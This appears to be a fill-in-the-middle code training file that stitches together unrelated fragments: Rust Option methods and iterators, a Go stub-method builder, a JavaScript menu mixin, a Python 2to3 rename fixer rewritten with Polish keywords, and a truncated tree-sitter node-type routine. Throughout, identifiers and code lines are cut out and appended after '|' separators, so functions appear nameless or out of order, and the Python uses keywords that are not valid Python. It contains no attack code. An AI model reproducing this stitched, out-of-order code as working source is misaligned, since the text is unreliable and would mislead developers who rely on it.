IterMut { inner: Item { opt: self.as_mut() } }
}
/////////////////////////////////////////////////////////////////////////
// Boolean operations on the values, eager and lazy
/////////////////////////////////////////////////////////////////////////
/// Returns [`None`] if the option is [`None`], otherwise returns `optb`.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some(2);
/// let y: Option<&str> = None;
/// assert_eq!(x.and(y), None);
///
/// let x: Option<u32> = None;
/// let y = Some("foo");
/// assert_eq!(x.and(y), None);
///
/// let x = Some(2);
/// let y = Some("foo");
/// assert_eq!(x.and(y), Some("foo"));
///
/// let x: Option<u32> = None;
/// let y: Option<&str> = None;
/// assert_eq!(x.and(y), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn and<U>(self, optb: Option<U>) -> Option<U> {
match self {
Some(_) => optb,
None => None,
}
}
/// Returns [`None`] if the option is [`None`], otherwise calls `f` with the
/// wrapped value and returns the result.
///
/// Some languages call this operation flatmap.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// fn sq(x: u32) -> Option<u32> { Some(x * x) }
/// fn nope(_: u32) -> Option<u32> { None }
///
/// assert_eq!(Some(2).and_then(sq).and_then(sq), Some(16));
/// assert_eq!(Some(2).and_then(sq).and_then(nope), None);
/// assert_eq!(Some(2).and_then(nope).and_then(sq), None);
/// assert_eq!(None.and_then(sq).and_then(sq), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn | <U, F: FnOnce(T) -> Option<U>>(self, f: F) -> Option<U> {
match self {
Some(x) => f(x),
None => None,
}
}
/// Returns `None` if the option is `None`, otherwise calls `predicate`
/// with the wrapped value and returns:
///
/// - `Some(t)` if `predicate` returns `true` (where `t` is the wrapped
/// value), and
/// - `None` if `predicate` returns `false`.
///
/// This function works similar to `Iterator::filter()`. You can imagine
/// the `Option<T>` being an iterator over one or zero elements. `filter()`
/// lets you decide which elements to keep.
///
/// # Examples
///
/// ```rust
/// fn is_even(n: &i32) -> bool {
/// n % 2 == 0
/// }
///
/// assert_eq!(None.filter(is_even), None);
/// assert_eq!(Some(3).filter(is_even), None);
/// assert_eq!(Some(4).filter(is_even), Some(4));
/// ```
#[inline]
#[stable(feature = "option_filter", since = "1.27.0")]
pub fn filter<P: FnOnce(&T) -> bool>(self, predicate: P) -> Self {
if let Some(x) = self {
if predicate(&x) {
return Some(x)
}
}
None
}
/// Returns the option if it contains a value, otherwise returns `optb`.
///
/// Arguments passed to `or` are eagerly evaluated; if you are passing the
/// result of a function call, it is recommended to use [`or_else`], which is
/// lazily evaluated.
///
/// [`or_else`]: #method.or_else
///
/// # Examples
///
/// ```
/// let x = Some(2);
/// let y = None;
/// assert_eq!(x.or(y), Some(2));
///
/// let x = None;
/// let y = Some(100);
/// assert_eq!(x.or(y), Some(100));
///
/// let x = Some(2);
/// let y = Some(100);
/// assert_eq!(x.or(y), Some(2));
///
/// let x: Option<u32> = None;
/// let y = None;
/// assert_eq!(x.or(y), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn or(self, optb: Option<T>) -> Option<T> {
match self {
Some(_) => self,
None => optb,
}
}
/// Returns the option if it contains a value, otherwise calls `f` and
/// returns the result.
///
/// # Examples
///
/// ```
/// fn nobody() -> Option<&'static str> { None }
/// fn vikings() -> Option<&'static str> { Some("vikings") }
///
/// assert_eq!(Some("barbarians").or_else(vikings), Some("barbarians"));
/// assert_eq!(None.or_else(vikings), Some("vikings"));
/// assert_eq!(None.or_else(nobody), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn or_else<F: FnOnce() -> Option<T>>(self, f: F) -> Option<T> {
match self {
Some(_) => self,
None => f(),
}
}
/// Returns [`Some`] if exactly one of `self`, `optb` is [`Some`], otherwise returns `None`.
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// #![feature(option_xor)]
///
/// let x = Some(2);
/// let y: Option<u32> = None;
/// assert_eq!(x.xor(y), Some(2));
///
/// let x: Option<u32> = None;
/// let y = Some(2);
/// assert_eq!(x.xor(y), Some(2));
///
/// let x = Some(2);
/// let y = Some(2);
/// assert_eq!(x.xor(y), None);
///
/// let x: Option<u32> = None;
/// let y: Option<u32> = None;
/// assert_eq!(x.xor(y), None);
/// ```
#[inline]
#[unstable(feature = "option_xor", issue = "50512")]
pub fn xor(self, optb: Option<T>) -> Option<T> {
match (self, optb) {
(Some(a), None) => Some(a),
(None, Some(b)) => Some(b),
_ => None,
}
}
/////////////////////////////////////////////////////////////////////////
// Entry-like operations to insert if None and return a reference
/////////////////////////////////////////////////////////////////////////
/// Inserts `v` into the option if it is [`None`], then
/// returns a mutable reference to the contained value.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = None;
///
/// {
/// let y: &mut u32 = x.get_or_insert(5);
/// assert_eq!(y, &5);
///
/// *y = 7;
/// }
///
/// assert_eq!(x, Some(7));
/// ```
#[inline]
#[stable(feature = "option_entry", since = "1.20.0")]
pub fn get_or_insert(&mut self, v: T) -> &mut T {
match *self {
None => *self = Some(v),
_ => (),
}
match *self {
Some(ref mut v) => v,
None => unsafe { hint::unreachable_unchecked() },
}
}
/// Inserts a value computed from `f` into the option if it is [`None`], then
/// returns a mutable reference to the contained value.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = None;
///
/// {
/// let y: &mut u32 = x.get_or_insert_with(|| 5);
/// assert_eq!(y, &5);
///
/// *y = 7;
/// }
///
/// assert_eq!(x, Some(7));
/// ```
#[inline]
#[stable(feature = "option_entry", since = "1.20.0")]
pub fn get_or_insert_with<F: FnOnce() -> T>(&mut self, f: F) -> &mut T {
match *self {
None => *self = Some(f()),
_ => (),
}
match *self {
Some(ref mut v) => v,
None => unsafe { hint::unreachable_unchecked() },
}
}
/////////////////////////////////////////////////////////////////////////
// Misc
/////////////////////////////////////////////////////////////////////////
/// Takes the value out of the option, leaving a [`None`] in its place.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = Some(2);
/// let y = x.take();
/// assert_eq!(x, None);
/// assert_eq!(y, Some(2));
///
/// let mut x: Option<u32> = None;
/// let y = x.take();
/// assert_eq!(x, None);
/// assert_eq!(y, None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn take(&mut self) -> Option<T> {
mem::replace(self, None)
}
/// Replaces the actual value in the option by the value given in parameter,
/// returning the old value if present,
/// leaving a [`Some`] in its place without deinitializing either one.
///
/// [`Some`]: #variant.Some
///
/// # Examples
///
/// ```
/// #![feature(option_replace)]
///
/// let mut x = Some(2);
/// let old = x.replace(5);
/// assert_eq!(x, Some(5));
/// assert_eq!(old, Some(2));
///
/// let mut x = None;
/// let old = x.replace(3);
/// assert_eq!(x, Some(3));
/// assert_eq!(old, None);
/// ```
#[inline]
#[unstable(feature = "option_replace", issue = "51998")]
pub fn replace(&mut self, value: T) -> Option<T> {
mem::replace(self, Some(value))
}
}
impl<'a, T: Clone> Option<&'a T> {
/// Maps an `Option<&T>` to an `Option<T>` by cloning the contents of the
/// option.
///
/// # Examples
///
/// ```
/// let x = 12;
/// let opt_x = Some(&x);
/// assert_eq!(opt_x, Some(&12));
/// let cloned = opt_x.cloned();
/// assert_eq!(cloned, Some(12));
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn cloned(self) -> Option<T> {
self.map(|t| t.clone())
}
}
impl<'a, T: Clone> Option<&'a mut T> {
/// Maps an `Option<&mut T>` to an `Option<T>` by cloning the contents of the
/// option.
///
/// # Examples
///
/// ```
/// let mut x = 12;
/// let opt_x = Some(&mut x);
/// assert_eq!(opt_x, Some(&mut 12));
/// let cloned = opt_x.cloned();
/// assert_eq!(cloned, Some(12));
/// ```
#[stable(since = "1.26.0", feature = "option_ref_mut_cloned")]
pub fn cloned(self) -> Option<T> {
self.map(|t| t.clone())
}
}
impl<T: Default> Option<T> {
/// Returns the contained value or a default
///
/// Consumes the `self` argument then, if [`Some`], returns the contained
/// value, otherwise if [`None`], returns the [default value] for that
/// type.
///
/// # Examples
///
/// Convert a string to an integer, turning poorly-formed strings
/// into 0 (the default value for integers). [`parse`] converts
/// a string to any other type that implements [`FromStr`], returning
/// [`None`] on error.
///
/// ```
/// let good_year_from_input = "1909";
/// let bad_year_from_input = "190blarg";
/// let good_year = good_year_from_input.parse().ok().unwrap_or_default();
/// let bad_year = bad_year_from_input.parse().ok().unwrap_or_default();
///
/// assert_eq!(1909, good_year);
/// assert_eq!(0, bad_year);
/// ```
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
/// [default value]: ../default/trait.Default.html#tymethod.default
/// [`parse`]: ../../std/primitive.str.html#method.parse
/// [`FromStr`]: ../../std/str/trait.FromStr.html
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or_default(self) -> T {
match self {
Some(x) => x,
None => Default::default(),
}
}
}
#[unstable(feature = "inner_deref", reason = "newly added", issue = "50264")]
impl<T: Deref> Option<T> {
/// Converts from `&Option<T>` to `Option<&T::Target>`.
///
/// Leaves the original Option in-place, creating a new one with a reference
/// to the original one, additionally coercing the contents via `Deref`.
pub fn deref(&self) -> Option<&T::Target> {
self.as_ref().map(|t| t.deref())
}
}
impl<T, E> Option<Result<T, E>> {
/// Transposes an `Option` of a `Result` into a `Result` of an `Option`.
///
/// `None` will be mapped to `Ok(None)`.
/// `Some(Ok(_))` and `Some(Err(_))` will be mapped to `Ok(Some(_))` and `Err(_)`.
///
/// # Examples
///
/// ```
/// #![feature(transpose_result)]
///
/// #[derive(Debug, Eq, PartialEq)]
/// struct SomeErr;
///
/// let x: Result<Option<i32>, SomeErr> = Ok(Some(5));
/// let y: Option<Result<i32, SomeErr>> = Some(Ok(5));
/// assert_eq!(x, y.transpose());
/// ```
#[inline]
#[unstable(feature = "transpose_result", issue = "47338")]
pub fn transpose(self) -> Result<Option<T>, E> {
match self {
Some(Ok(x)) => Ok(Some(x)),
Some(Err(e)) => Err(e),
None => Ok(None),
}
}
}
// This is a separate function to reduce the code size of .expect() itself.
#[inline(never)]
#[cold]
fn expect_failed(msg: &str) -> ! {
panic!("{}", msg)
}
/////////////////////////////////////////////////////////////////////////////
// Trait implementations
/////////////////////////////////////////////////////////////////////////////
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Default for Option<T> {
/// Returns [`None`].
///
/// [`None`]: #variant.None
#[inline]
fn default() -> Option<T> { None }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> IntoIterator for Option<T> {
type Item = T;
type IntoIter = IntoIter<T>;
/// Returns a consuming iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let x = Some("string");
/// let v: Vec<&str> = x.into_iter().collect();
/// assert_eq!(v, ["string"]);
///
/// let x = None;
/// let v: Vec<&str> = x.into_iter().collect();
/// assert!(v.is_empty());
/// ```
#[inline]
fn into_iter(self) -> IntoIter<T> {
IntoIter { inner: Item { opt: self } }
}
}
#[stable(since = "1.4.0", feature = "option_iter")]
impl<'a, T> IntoIterator for &'a Option<T> {
type Item = &'a T;
type IntoIter = Iter<'a, T>;
fn into_iter(self) -> Iter<'a, T> {
self.iter()
}
}
#[stable(since = "1.4.0", feature = "option_iter")]
impl<'a, T> IntoIterator for &'a mut Option<T> {
type Item = &'a mut T;
type IntoIter = IterMut<'a, T>;
fn into_iter(self) -> IterMut<'a, T> {
self.iter_mut()
}
}
#[stable(since = "1.12.0", feature = "option_from")]
impl<T> From<T> for Option<T> {
fn from(val: T) -> Option<T> {
Some(val)
}
}
/////////////////////////////////////////////////////////////////////////////
// The Option Iterators
/////////////////////////////////////////////////////////////////////////////
#[derive(Clone, Debug)]
struct Item<A> {
opt: Option<A>
}
impl<A> Iterator for Item<A> {
type Item = A;
#[inline]
fn next(&mut self) -> Option<A> {
self.opt.take()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
match self.opt {
Some(_) => (1, Some(1)),
None => (0, Some(0)),
}
}
}
impl<A> DoubleEndedIterator for Item<A> {
#[inline]
fn next_back(&mut self) -> Option<A> {
self.opt.take()
}
}
impl<A> ExactSizeIterator for Item<A> {}
impl<A> FusedIterator for Item<A> {}
unsafe impl<A> TrustedLen for Item<A> {}
/// An iterator over a reference to the [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::iter`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::iter`]: enum.Option.html#method.iter
#[stable(feature = "rust1", since = "1.0.0")]
#[derive(Debug)]
pub struct Iter<'a, A: 'a> { inner: Item<&'a A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Iterator for Iter<'a, A> {
type Item = &'a A;
#[inline]
fn next(&mut self) -> Option<&'a A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> DoubleEndedIterator for Iter<'a, A> {
#[inline]
fn next_back(&mut self) -> Option<&'a A> { self.inner.next_back() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> ExactSizeIterator for Iter<'a, A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<'a, A> FusedIterator for Iter<'a, A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<'a, A> TrustedLen for Iter<'a, A> {}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Clone for Iter<'a, A> {
#[inline]
fn clone(&self) -> Iter<'a, A> {
Iter { inner: self.inner.clone() }
}
}
/// An iterator over a mutable reference to the [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::iter_mut`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::iter_mut`]: enum.Option.html#method.iter_mut
#[stable(feature = "rust1", since = "1.0.0")]
#[derive(Debug)]
pub struct IterMut<'a, A: 'a> { inner: Item<&'a mut A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Iterator for IterMut<'a, A> {
type Item = &'a mut A;
#[inline]
fn next(&mut self) -> Option<&'a mut A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> DoubleEndedIterator for IterMut<'a, A> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut A> { self.inner.next_back() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> ExactSizeIterator for IterMut<'a, A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<'a, A> FusedIterator for IterMut<'a, A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<'a, A> TrustedLen for IterMut<'a, A> {}
/// An iterator over the value in [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::into_iter`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::into_iter`]: enum.Option.html#method.into_iter
#[derive(Clone, Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct IntoIter<A> { inner: Item<A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> Iterator for IntoIter<A> {
type Item = A;
#[inline]
fn next(&mut self) -> Option<A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> DoubleEndedIterator for IntoIter<A> {
#[inline]
fn next_back(&mut self) -> Option<A> { self.inner.next_back() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> ExactSizeIterator for IntoIter<A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<A> FusedIterator for IntoIter<A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<A> TrustedLen for IntoIter<A> {}
/////////////////////////////////////////////////////////////////////////////
// FromIterator
/////////////////////////////////////////////////////////////////////////////
#[stable(feature = "rust1", since = "1.0.0")]
impl<A, V: FromIterator<A>> FromIterator<Option<A>> for Option<V> {
/// Takes each element in the [`Iterator`]: if it is [`None`], no further
/// elements are taken, and the [`None`] is returned. Should no [`None`] occur, a
/// container with the values of each `Option` is returned.
///
/// Here is an example which increments every integer in a vector,
/// checking for overflow:
///
/// ```
/// use std::u16;
///
/// let v = vec![1, 2];
/// let res: Option<Vec<u16>> = v.iter().map(|&x: &u16|
/// if x == u16::MAX { None }
/// else { Some(x + 1) }
/// ).collect();
/// assert!(res == Some(vec![2, 3]));
/// ```
///
/// [`Iterator`]: ../iter/trait.Iterator.html
/// [`None`]: enum.Option.html#variant.None
#[inline]
fn from_iter<I: IntoIterator<Item=Option<A>>>(iter: I) -> Option<V> {
// FIXME(#11084): This could be replaced with Iterator::scan when this
// performance bug is closed.
struct Adapter<Iter> {
iter: Iter,
found_none: bool,
}
impl<T, Iter: Iterator<Item=Option<T>>> Iterator for Adapter<Iter> {
type Item = T;
#[inline]
fn next(&mut self) -> Option<T> {
match self.iter.next() {
Some(Some(value)) => Some(value),
Some(None) => {
self.found_none = true;
None
}
None => None,
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.found_none {
(0, Some(0))
} else {
let (_, upper) = self.iter.size_hint();
(0, upper)
}
}
}
let mut adapter = Adapter { iter: iter.into_iter(), found_none: false };
let v: V = FromIterator::from_iter(adapter.by_ref());
if adapter.found_none {
None
} else {
Some(v)
}
}
}
/// The error type that results from applying the try operator (`?`) to a `None` value. If you wish
/// to allow `x?` (where `x` is an `Option<T>`) to be converted into your error type, you can
/// implement `impl From<NoneError>` for `YourErrorType`. In that case, `x?` within a function that
/// returns `Result<_, YourErrorType>` will translate a `None` value into an `Err` result.
#[unstable(feature = "try_trait", issue = "42327")]
#[derive(Clone, Copy, PartialEq, PartialOrd, Eq, Ord, Debug, Hash)]
pub struct NoneError;
#[unstable(feature = "try_trait", issue = "42327")]
impl<T> ops::Try for Option<T> {
type Ok = T;
type Error = NoneError;
#[inline]
fn into_result(self) -> Result<T, NoneError> {
self.ok_or(NoneError)
}
#[inline]
fn from_ok(v: T) -> Self {
Some(v)
}
#[inline]
fn from_error(_: NoneError) -> Self {
None
}
}
| and_then |
count_method_builder.go | package generator
import "go/ast"
func | (methodBuilder *MethodBuilder) *CountMethodBuilder {
return &CountMethodBuilder{
methodBuilder: methodBuilder,
}
}
// CountMethodBuilder is responsible for creating a method on the stub
// structure that allows you to check how many times the stubbed method
// was called.
//
// Example:
// func (stub *StubStruct) SumCallCount() int {
// // ...
// }
type CountMethodBuilder struct {
methodBuilder *MethodBuilder
mutexFieldSelector *ast.SelectorExpr
argsFieldSelector *ast.SelectorExpr
}
func (b *CountMethodBuilder) SetMutexFieldSelector(selector *ast.SelectorExpr) {
b.mutexFieldSelector = selector
}
func (b *CountMethodBuilder) SetArgsFieldSelector(selector *ast.SelectorExpr) {
b.argsFieldSelector = selector
}
func (b *CountMethodBuilder) Build() ast.Decl {
mutexLockBuilder := NewMutexActionBuilder()
mutexLockBuilder.SetMutexFieldSelector(b.mutexFieldSelector)
mutexLockBuilder.SetAction("RLock")
mutexUnlockBuilder := NewMutexActionBuilder()
mutexUnlockBuilder.SetMutexFieldSelector(b.mutexFieldSelector)
mutexUnlockBuilder.SetAction("RUnlock")
mutexUnlockBuilder.SetDeferred(true)
b.methodBuilder.SetType(&ast.FuncType{
Params: &ast.FieldList{},
Results: &ast.FieldList{
List: []*ast.Field{
{
Type: ast.NewIdent("int"),
},
},
},
})
b.methodBuilder.AddStatementBuilder(mutexLockBuilder)
b.methodBuilder.AddStatementBuilder(mutexUnlockBuilder)
b.methodBuilder.AddStatementBuilder(StatementToBuilder(&ast.ReturnStmt{
Results: []ast.Expr{
&ast.CallExpr{
Fun: ast.NewIdent("len"),
Args: []ast.Expr{
b.argsFieldSelector,
},
},
},
}))
return b.methodBuilder.Build()
}
| NewCountMethodBuilder |
mixin.js | import CommonIcon from '_c/common-icon'
import { showTitle } from '@/libs/util' | export default {
components: {
CommonIcon
},
methods: {
showTitle (item) {
return showTitle(item, this)
},
showChildren (item) {
return item.children && item.children.length
},
getNameOrHref (item, children0) {
return item.href ? `isTurnByHref_${item.href}` : (children0 ? item.children[0].path : item.path)
}
}
} | |
fix_renames.py | """Fix incompatible renames
Fixes:
* sys.maxint -> sys.maxsize
"""
# Author: Christian Heimes
# based on Collin Winter's fix_import
# Local imports
z .. zaimportuj fixer_base
z ..fixer_util zaimportuj Name, attr_chain
MAPPING = {"sys": {"maxint" : "maxsize"},
}
LOOKUP = {}
def alternates(members):
zwróć "(" + "|".join(map(repr, members)) + ")"
def build_pattern():
#bare = set()
dla module, replace w list(MAPPING.items()):
dla old_attr, new_attr w list(replace.items()):
LOOKUP[(module, old_attr)] = new_attr
#bare.add(module) | # import_name< 'import' (module=%r
# | dotted_as_names< any* module=%r any* >) >
# """ % (module, module)
uzyskaj """
import_from< 'from' module_name=%r 'import'
( attr_name=%r | import_as_name< attr_name=%r 'as' any >) >
""" % (module, old_attr, old_attr)
uzyskaj """
power< module_name=%r trailer< '.' attr_name=%r > any* >
""" % (module, old_attr)
#uzyskaj """bare_name=%s""" % alternates(bare)
klasa FixRenames(fixer_base.BaseFix):
BM_compatible = Prawda
PATTERN = "|".join(build_pattern())
order = "pre" # Pre-order tree traversal
# Don't match the node jeżeli it's within another match
def match(self, node):
match = super(FixRenames, self).match
results = match(node)
jeżeli results:
jeżeli any(match(obj) dla obj w attr_chain(node, "parent")):
zwróć Nieprawda
zwróć results
zwróć Nieprawda
#def start_tree(self, tree, filename):
# super(FixRenames, self).start_tree(tree, filename)
# self.replace = {}
def transform(self, node, results):
mod_name = results.get("module_name")
attr_name = results.get("attr_name")
#bare_name = results.get("bare_name")
#import_mod = results.get("module")
jeżeli mod_name oraz attr_name:
new_attr = LOOKUP[(mod_name.value, attr_name.value)]
attr_name.replace(Name(new_attr, prefix=attr_name.prefix)) | #bare.add(old_attr)
#uzyskaj """ |
node_types.rs | use super::grammars::{LexicalGrammar, SyntaxGrammar, VariableType};
use super::rules::{Alias, AliasMap, Symbol, SymbolType};
use crate::error::{Error, Result};
use serde_derive::Serialize;
use std::collections::{BTreeMap, HashMap, HashSet};
#[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub(crate) enum ChildType {
Normal(Symbol),
Aliased(Alias),
}
#[derive(Clone, Debug, Default, PartialEq, Eq)]
pub(crate) struct FieldInfo {
pub quantity: ChildQuantity,
pub types: Vec<ChildType>,
}
#[derive(Clone, Debug, Default, PartialEq, Eq)]
pub(crate) struct VariableInfo {
pub fields: HashMap<String, FieldInfo>,
pub children: FieldInfo,
pub children_without_fields: FieldInfo,
pub has_multi_step_production: bool,
}
#[derive(Debug, Serialize, PartialEq, Eq, Default, PartialOrd, Ord)]
pub(crate) struct NodeInfoJSON {
#[serde(rename = "type")]
kind: String,
named: bool,
#[serde(skip_serializing_if = "Option::is_none")]
fields: Option<BTreeMap<String, FieldInfoJSON>>,
#[serde(skip_serializing_if = "Option::is_none")]
children: Option<FieldInfoJSON>,
#[serde(skip_serializing_if = "Option::is_none")]
subtypes: Option<Vec<NodeTypeJSON>>,
}
#[derive(Clone, Debug, Serialize, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub(crate) struct NodeTypeJSON {
#[serde(rename = "type")]
kind: String,
named: bool,
}
#[derive(Debug, Serialize, PartialEq, Eq, PartialOrd, Ord)]
pub(crate) struct FieldInfoJSON {
multiple: bool,
required: bool,
types: Vec<NodeTypeJSON>,
}
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub struct ChildQuantity {
exists: bool,
required: bool,
multiple: bool,
}
impl Default for FieldInfoJSON {
fn default() -> Self {
FieldInfoJSON {
multiple: false,
required: true,
types: Vec::new(),
}
}
}
impl Default for ChildQuantity {
fn default() -> Self {
Self::one()
}
}
impl ChildQuantity {
fn zero() -> Self {
ChildQuantity {
exists: false,
required: false,
multiple: false,
}
}
fn one() -> Self {
ChildQuantity {
exists: true,
required: true,
multiple: false,
}
}
fn append(&mut self, other: ChildQuantity) {
if other.exists {
if self.exists || other.multiple {
self.multiple = true;
}
if other.required {
self.required = true;
}
self.exists = true;
}
}
fn union(&mut self, other: ChildQuantity) -> bool {
let mut result = false;
if !self.exists && other.exists {
result = true;
self.exists = true;
}
if self.required && !other.required {
result = true;
self.required = false;
}
if !self.multiple && other.multiple {
result = true;
self.multiple = true;
}
result
}
}
/// Compute a summary of the public-facing structure of each variable in the
/// grammar. Each variable in the grammar corresponds to a distinct public-facing
/// node type.
///
/// The information collected about each node type `N` is:
/// 1. `child_types` - The types of visible children that can appear within `N`.
/// 2. `fields` - The fields that `N` can have. Data regarding each field:
/// * `types` - The types of visible children the field can contain.
/// * `optional` - Do `N` nodes always have this field?
/// * `multiple` - Can `N` nodes have multiple children for this field?
/// 3. `children_without_fields` - The *other* named children of `N` that are
/// not associated with fields. Data regarding these children:
/// * `types` - The types of named children with no field.
/// * `optional` - Do `N` nodes always have at least one named child with no field?
/// * `multiple` - Can `N` nodes have multiple named children with no field?
///
/// Each summary must account for some indirect factors:
/// 1. hidden nodes. When a parent node `N` has a hidden child `C`, the visible
/// children of `C` *appear* to be direct children of `N`.
/// 2. aliases. If a parent node type `M` is aliased as some other type `N`,
/// then nodes which *appear* to have type `N` may have internal structure based
/// on `M`.
pub(crate) fn get_variable_info(
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
simple_aliases: &AliasMap,
) -> Result<Vec<VariableInfo>> {
let child_type_is_visible = |t: &ChildType| {
variable_type_for_child_type(t, syntax_grammar, lexical_grammar) >= VariableType::Anonymous
};
let child_type_is_named = |t: &ChildType| {
variable_type_for_child_type(t, syntax_grammar, lexical_grammar) == VariableType::Named
};
// Each variable's summary can depend on the summaries of other hidden variables,
// and variables can have mutually recursive structure. So we compute the summaries
// iteratively, in a loop that terminates only when no more changes are possible.
let mut did_change = true;
let mut all_initialized = false;
let mut result = vec![VariableInfo::default(); syntax_grammar.variables.len()];
while did_change {
did_change = false;
for (i, variable) in syntax_grammar.variables.iter().enumerate() {
let mut variable_info = result[i].clone();
// Examine each of the variable's productions. The variable's child types can be
// immediately combined across all productions, but the child quantities must be
// recorded separately for each production.
for production in &variable.productions {
let mut production_field_quantities = HashMap::new();
let mut production_children_quantity = ChildQuantity::zero();
let mut production_children_without_fields_quantity = ChildQuantity::zero();
let mut production_has_uninitialized_invisible_children = false;
if production.steps.len() > 1 {
variable_info.has_multi_step_production = true;
}
for step in &production.steps {
let child_symbol = step.symbol;
let child_type = if let Some(alias) = &step.alias {
ChildType::Aliased(alias.clone())
} else if let Some(alias) = simple_aliases.get(&step.symbol) {
ChildType::Aliased(alias.clone())
} else {
ChildType::Normal(child_symbol)
};
let child_is_hidden = !child_type_is_visible(&child_type)
&& !syntax_grammar.supertype_symbols.contains(&child_symbol);
// Maintain the set of all child types for this variable, and the quantity of
// visible children in this production.
did_change |=
extend_sorted(&mut variable_info.children.types, Some(&child_type));
if !child_is_hidden {
production_children_quantity.append(ChildQuantity::one());
}
// Maintain the set of child types associated with each field, and the quantity
// of children associated with each field in this production.
if let Some(field_name) = &step.field_name {
let field_info = variable_info
.fields
.entry(field_name.clone())
.or_insert(FieldInfo::default());
did_change |= extend_sorted(&mut field_info.types, Some(&child_type));
let production_field_quantity = production_field_quantities
.entry(field_name)
.or_insert(ChildQuantity::zero());
// Inherit the types and quantities of hidden children associated with fields.
if child_is_hidden && child_symbol.is_non_terminal() {
let child_variable_info = &result[child_symbol.index];
did_change |= extend_sorted(
&mut field_info.types,
&child_variable_info.children.types,
);
production_field_quantity.append(child_variable_info.children.quantity);
} else {
production_field_quantity.append(ChildQuantity::one());
}
}
// Maintain the set of named children without fields within this variable.
else if child_type_is_named(&child_type) {
production_children_without_fields_quantity.append(ChildQuantity::one());
did_change |= extend_sorted(
&mut variable_info.children_without_fields.types,
Some(&child_type),
);
}
// Inherit all child information from hidden children.
if child_is_hidden && child_symbol.is_non_terminal() {
let child_variable_info = &result[child_symbol.index];
// If a hidden child can have multiple children, then its parent node can
// appear to have multiple children.
if child_variable_info.has_multi_step_production {
variable_info.has_multi_step_production = true;
}
// If a hidden child has fields, then the parent node can appear to have
// those same fields.
for (field_name, child_field_info) in &child_variable_info.fields {
production_field_quantities
.entry(field_name)
.or_insert(ChildQuantity::zero())
.append(child_field_info.quantity);
did_change |= extend_sorted(
&mut variable_info
.fields
.entry(field_name.clone())
.or_insert(FieldInfo::default())
.types,
&child_field_info.types,
);
}
// If a hidden child has children, then the parent node can appear to have
// those same children.
production_children_quantity.append(child_variable_info.children.quantity);
did_change |= extend_sorted(
&mut variable_info.children.types,
&child_variable_info.children.types,
);
// If a hidden child can have named children without fields, then the parent
// node can appear to have those same children.
if step.field_name.is_none() {
let grandchildren_info = &child_variable_info.children_without_fields;
if !grandchildren_info.types.is_empty() {
production_children_without_fields_quantity
.append(child_variable_info.children_without_fields.quantity);
did_change |= extend_sorted(
&mut variable_info.children_without_fields.types,
&child_variable_info.children_without_fields.types,
);
}
}
}
// Note whether or not this production contains children whose summaries
// have not yet been computed.
if child_symbol.index >= i && !all_initialized {
production_has_uninitialized_invisible_children = true;
}
}
// If this production's children all have had their summaries initialized,
// then expand the quantity information with all of the possibilities introduced
// by this production.
if !production_has_uninitialized_invisible_children {
did_change |= variable_info
.children
.quantity
.union(production_children_quantity);
did_change |= variable_info
